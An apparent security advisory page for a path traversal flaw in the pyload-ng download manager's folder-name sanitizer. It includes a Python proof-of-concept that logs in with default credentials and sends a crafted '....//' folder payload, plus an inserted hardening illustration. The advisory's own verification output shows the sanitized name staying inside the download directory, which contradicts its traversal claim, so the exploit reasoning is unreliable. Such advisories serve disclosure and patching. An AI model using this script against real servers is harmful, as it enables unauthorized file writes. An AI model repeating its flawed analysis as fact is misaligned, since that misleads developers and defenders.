PyLoad-ng CVE-2026-42314
Severity: MEDIUM
CVSS vector (NVD): CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Blast Radius
Ecosystem impact: 1 PyPI package depends on pyload-ng (1 direct, 0 indirect). Ecosystem-wide dependent count for version 0.5.0b3.dev100.
Description (NVD)
Insufficient sanitization of package folder names allows writing files outside the intended download directory.
Affected Component
src/pyload/core/api/__init__.py, function add_package()
Description
Package folder names are sanitized using insufficient string replacement:

folder = (
    folder.replace("http://", "")
    .replace("https://", "")
    .replace("../", "_")  # Bypassable!
    .replace("..\\", "_")
    .replace(":", "")
    .replace("/", "_")
    .replace("\\", "_")
)

The ../ replacement is bypassable because it runs in a single pass rather than repeating until nothing changes. The pattern ....// is only partially removed: its inner ../ becomes _, leaving .._ at the front, so a .. sequence survives and can be exploited when the path is later resolved by the OS.
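As an added illustration (not pyLoad's code and not part of the advisory), the sanitizer quoted above is placed beside a hardened replacement and a path-containment check of the kind the verification section below reasons about; safe_folder and resolves_inside are assumed names, and the payload string is the constructed one from the advisory.

```python
import os
import re


def weak_sanitize(folder: str) -> str:
    """The single-pass string-replacement sanitizer quoted in the advisory."""
    return (
        folder.replace("http://", "")
        .replace("https://", "")
        .replace("../", "_")
        .replace("..\\", "_")
        .replace(":", "")
        .replace("/", "_")
        .replace("\\", "_")
    )


def safe_folder(folder: str) -> str:
    """Hardened variant (assumed name, not pyLoad's code): split on both
    separator styles, drop components that are empty or consist only of
    dots (".", "..", "....") and collapse the rest into ONE component."""
    parts = re.split(r"[\\/]+", folder)
    kept = [p for p in parts if p and set(p) != {"."}]
    if not kept:
        raise ValueError("folder name has no usable component")
    name = "_".join(kept)
    # Conservative character whitelist as a second layer
    return re.sub(r"[^A-Za-z0-9._ -]", "_", name)


def resolves_inside(base: str, name: str) -> bool:
    """Defence in depth: after symlink and '..' resolution the target must
    still be under base. Apply this right before the file is opened."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, name))
    return os.path.commonpath([base_real, target]) == base_real


if __name__ == "__main__":
    payload = "....//....//....//tmp/evil"  # constructed, from the advisory
    print("weak     :", weak_sanitize(payload))  # ..__..__..__tmp_evil
    print("safe     :", safe_folder(payload))    # tmp_evil
    print("contained:", resolves_inside("/srv/downloads", payload))  # False
```

The containment check is the layer that catches any future sanitizer bypass, because it judges the resolved path rather than the string.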
Proof of Concept
Setup

pip install pyload-ng[all]
pyload -d &
# Default credentials: pyload / pyload

Exploit
#!/usr/bin/env python3
import requests

BASE_URL = "http://localhost:8000"
USERNAME = "pyload"
PASSWORD = "pyload"

session = requests.Session()

# Login
session.post(f"{BASE_URL}/login", data={
    "username": USERNAME,
    "password": PASSWORD
})

# Create package with malicious folder name
# The pattern ....// bypasses the ../ replacement
# After the ../ replacement: .._/ (still contains ..)
folder_payload = "....//....//....//tmp/evil"

resp = session.post(f"{BASE_URL}/api/add_package", json={
    "name": "test_package",
    "links": ["http://example.com/file.txt"],
    "dest": 1  # Destination.QUEUE
})
package_id = resp.json()
print(f"Created package: {package_id}")

# Set malicious folder name
resp = session.post(f"{BASE_URL}/api/set_package_data", json={
    "package_id": package_id,
    "data": {"folder": folder_payload}
})
print(f"Set folder payload: {folder_payload}")
print(f"Response: {resp.status_code}")

# When download occurs, files will be written outside download dir
print("[+] When a file is downloaded, it will be written to manipulated path")
print("    The sanitized folder still contains '..' sequences that OS resolves")

Verification
Check where files would be written:

import os

download_dir = "/home/user/Downloads"
folder = "....//....//....//tmp/evil"

# Simulate pyLoad's sanitization (the two replacements that matter here)
sanitized = folder.replace("../", "_").replace("/", "_")
print(f"After pyLoad sanitization: {sanitized}")
# Output: ..__..__..__tmp_evil

# When pyLoad does os.path.join and then opens the file:
final_path = os.path.join(download_dir, sanitized)
print(f"Joined path: {final_path}")
# Output: /home/user/Downloads/..__..__..__tmp_evil
# The .. sequences remain and could be resolved by OS during file operations

Impact
Authenticated users with ADD permission can:
- Write files outside the download directory
- Potentially overwrite system files (depending on permissions)
- Clutter system directories with downloaded content
Analysis (AI)
Path traversal in PyLoad-ng package folder name sanitization allows authenticated users with ADD permission to write files outside the intended download directory via insufficient string replacement logic. The sanitizer replaces ../ with _, but the pattern ....// bypasses this filter by becoming .._ after replacement, leaving exploitable .. …
External POC / Exploit Code
GHSA-97r3-5w84-r4q8